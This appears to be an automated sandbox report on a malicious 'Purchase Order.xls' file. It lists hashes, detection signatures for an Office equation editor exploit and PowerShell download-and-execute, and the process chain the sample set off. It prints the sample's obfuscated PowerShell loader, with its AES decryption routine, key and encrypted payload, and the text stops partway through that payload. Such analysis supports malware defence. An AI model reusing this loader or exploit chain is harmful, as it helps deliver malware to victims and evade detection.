Edit tour
Windows
Analysis Report
Purchase Order.xls
Overview
General Information
| Sample name: | Purchase Order.xls |
| Analysis ID: | 1484765 |
| MD5: | 687e2dbe29881473305307b385e83aa6 |
| SHA1: | 19fb4e457a0d672b337941d0c1b4f74dd80d382e |
| SHA256: | b5c3cb22b04a481fa8052965bda8161c48bd9536b0815c1a362555ad5156d336 |
| Tags: | xls |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Powershell download and execute
AI detected suspicious Excel or Word document
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 2900 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
WINWORD.EXE (PID: 2304 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" -Em bedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) 
EQNEDT32.EXE (PID: 3216 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3284 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeth emoononlin etoseebeau tygir.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A) 
powershell.exe (PID: 3332 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command ( ('((e4jfun ction Decr ypt-AESEnc ryption {P aram([Stri ng]TMIBase 64Text,[St ringe4j+e4 j]TMIKey)T MIe4j+e4ja esManaged = New-Obje ct System. See4j+e4jc urity.Cryp tography.A esManaged; TMIa'+'esM anagee4j+e 4'+'jd.Mod ee4j+e4j = [Syse4j+' +'e4jtem.S ecurity.Cr yptoge4j+e 4jraphy.e4 j+e'+'4jCi e4'+'j+e4j pherMode]: :CBC;TMIae sManaged.' +'Pae4j+e4 jddin'+'g = [System. Security.C ryptograph y.PaddingM ode]::Zero s;TMIaesMa naged.Bloc kSiz'+'e = 128;TMIae sManaged.K eySize = 2 56;'+'TMIa esManagee4 j+'+'e4jd. Key = ('+' New-Object e4'+'j+e4j System.Se curity.Cry ptography. SHA256Mana ged).Compu teHash([Sy ste'+'m.Te xt.Encodin g]::UTF8.G ee4j+e4jtB ytes(TMIKe y));TMIcip herBytes = [Syst'+'e m.Convert] ::FromBase 64String(T MIBase64Te xt);TMIaes Managed.IV '+'= TMIc ipherBytes [0..15];TM Idecryptor = TMIaesM anaged.Cre ateDecrypt or();TMIde cryptedByt es = TMIde cryptor.Tr ansformFin '+'alBlock (TMIcipher Bytes, 16, TMIcipher Bytes.Leng th - 16);e 4j+e4jTMIa e'+'sManag ed.D'+'isp ose('+');r eturn [Sys tem.Text.E ncoding]:: UTF8.GetSt ring'+'(TM Idecry'+'p tedBytes). Tre4j+e4ji m([char]0) ;}TMIchave = CnI8735 5924191917 5716572217 55980918Cn Ie4j+e4j;T MItextoCri ptogr'+'af adoBase4j+ e4je64 = ' +'CnIOwXrO WTIG5swItg 7zFD9OyI4q wNW2DSA+q1 jveygII0r5 7qf0cAj6Ce 9uJCuE17Th TAaiQL4mof Qp8uqjn3VI IKuKAd9GJB 73yLEmkpBp YYcAEu88vS gVZa+wmnQQ koJtUCgSRa Hp+XfVoLXI wKzRec6cDm hGQTBR7Ul9 x0coyu8fZv CLEzPcJ9SC 07ffDROhHu hBSqKcCMGV kwzBfDe4wI 4QSXFR0cio axw4x1d9Oi aZdvRlQ7Tv m7FWSdWKap 1gku8Ftkup 76E06S7qo9 mEmw3tQ8qU v7o4vz2iRX s0ziV2zz43 kztQlVPWu5 6KrcwfHZt5 wsMDlm6y/k jkAExZm4pl uf7YEBU0A9 z1FI7c07Qh AF50PRC4b0 P4vexv0bzh iLdo0tp8cc kt4GwIeeQ3 GfV2Zur7rf 0fU7HcrFcz 3hfoXleLoc y+JFMy8qqS Qjd/XosQ7L oo1qTTpHGy QFWgZS1pB4 6Tc9lrI4VO xvSWX/GyT8 ubH3sMLCMJ hQtdXw1sKy OIfbmmuyt6 bekgtHwo9B T9lStdzFJJ Ap8PYU0AY5 HRE2jyPLQW pUgsOnPjx2 JPl/Sc0H2T sg6gjn/cwA 7+LtvKFZOY NFx30kb9Kk g120+UNFkm S3v8wisgRY UD+sxqWJCa oyPVzWfY58 4BmtA/Hr64 HnPrrWPzoy j9tUJT8UVO 3tT9eWx1M9 YKsK8yTrjE f02EoWBw4W nUMRgKTnjf FYyMLsg2Nn U1oxXqkoIt Ig2lwGDnOe JETOyEM7C6 A+wuPv6mak +vAs/xJ/I0 r6OiK7uPQ6 AkeYeI5dzZ uzjjQCCiZd kfko6mBk4n iDu0TENks2 a67LZ5FuJ4 PbW/s3WrI/ /butcIDgnv 8v1QVa1JGf 41+WksQ3kQ 4+9Xtf4DrV 8TOY/yzMuo BGDp2Ur+Y3 a2FqqH6Nsj On1LO8SRnw tJAKYUkfzt nQCwdRqbH3 gXLyXP4rQr JF639iKh0A 6dOiDVbjFb rHrK3HKIv1 d5DfX68wT1 a2VFCyRRJ6 xVCgM6V6ab MhOKLbZ+iR rubeGx7Pm2 FeTr5cAMo9 rGs2qWm0eC HiFGB0Yk+D 7U3tkSnZ7m guQUwDjGKV 9B7Rpt9c1l K0N1SYOY8k xIH4yniwPW rtZ+l3+PjC wWT0pOlu/Z OV3DLSFAMs Jg+fubDUUW 6CB+/nfD6n Y0TsrkIS8I x3ddTanSmn cNbv4w+qkU AGnU/k/ooz iQQFAmfxWE Rdymw9x5Gz 5l/oMs8qne LXH1MjFEGt 8BDdzFgL40